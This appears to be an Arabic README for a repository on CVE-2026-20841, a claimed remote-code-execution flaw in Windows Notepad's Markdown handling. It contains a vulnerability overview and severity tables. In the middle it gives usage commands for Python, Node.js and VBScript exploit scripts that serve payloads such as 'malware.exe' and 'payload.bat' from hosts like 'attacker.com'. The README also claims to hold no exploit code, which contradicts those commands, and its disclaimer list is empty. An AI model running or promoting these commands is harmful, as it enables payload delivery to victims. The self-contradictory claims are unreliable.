
CVE-2026-20841
مستودع للبحث الأمني والتحليل التقني
⚠️ هذا المستودع مخصص للأغراض التعليمية والدفاعية والبحثية فقط.
CVE-2026-20841 هي ثغرة أمنية خطيرة من نوع تنفيذ التعليمات البرمجية عن بُعد (RCE) تؤثر على وظيفة معالجة Markdown في برنامج "المفكرة" (Notepad) لنظام Windows.
قد يتمكن المهاجم من تشغيل تعليمات برمجية عشوائية عند فتح ملف مُعد خصيصًا بواسطة إصابة ضعيفة من برنامج "المفكرة" في Windows.
| المنتج | الحالة |
|---|---|
| برنامج "المفكرة" في Windows 11 | ضعيف |
| برنامج "المفكرة" في Windows 10 | ضعيف |
| الإصدارات المحدّثة/المصححة | غير ضعيف |
python CVE-2026-20841.py 192.168.1.100 80 malware.exe
إصدار Node.js
node CVE-2026-20841.js <host> <port> <payload-filename>
مثال:
node CVE-2026-20841.js attacker.com 445 payload.bat
إصدار VBScript (أصلي في Windows)
cscript //nologo CVE-2026-20841.vbs <host> <port> <payload-filename>
مثال:
cscript //nologo CVE-2026-20841.vbs 192.168.1.45 80 update.exe
توجد الثغرة داخل وظيفة معالجة محتوى Markdown في برنامج "المفكرة" في Windows.
قد يؤدي فتح ملف معد خصيصًا إلى عمليات ذاكرة غير آمنة قد تؤدي إلى تنفيذ تعليمات برمجية عشوائية ضمن سياق المستخدم الحالي.
مهاجم
│
▼
ملف Markdown معد
│
▼
الضحية يفتح الملف
│
▼
محلل Markdown ضعيف
│
▼
فساد الذاكرة
│
▼
تنفيذ التعليمات البرمجية
نظام التشغيل : Windows 11
التطبيق : المفكرة (Notepad)
المعمارية : x64
المصحح : WinDbg
التحليل : ثابت + ديناميكي
هذا المستودع لا يحتوي على كود استغلال (exploit) جاهز.
المعلومات المقدمة مخصصة فقط من أجل:
المستخدمون مسؤولون عن الامتثال لجميع القوانين واللوائح المعمول بها.
أبحاث الأمن السيبراني • تحليل الثغرات • الأمن الدفاعي
| الحقل | القيمة |
|---|
| CVE | CVE-2026-20841 |
| النوع | تنفيذ التعليمات البرمجية عن بُعد |
| ناقل الهجوم | ملف معد خصيصًا |
| تفاعل المستخدم | مطلوب |
| الصلاحيات المطلوبة | لا شيء |
| الخطورة | حرجة |
| البائع | Microsoft |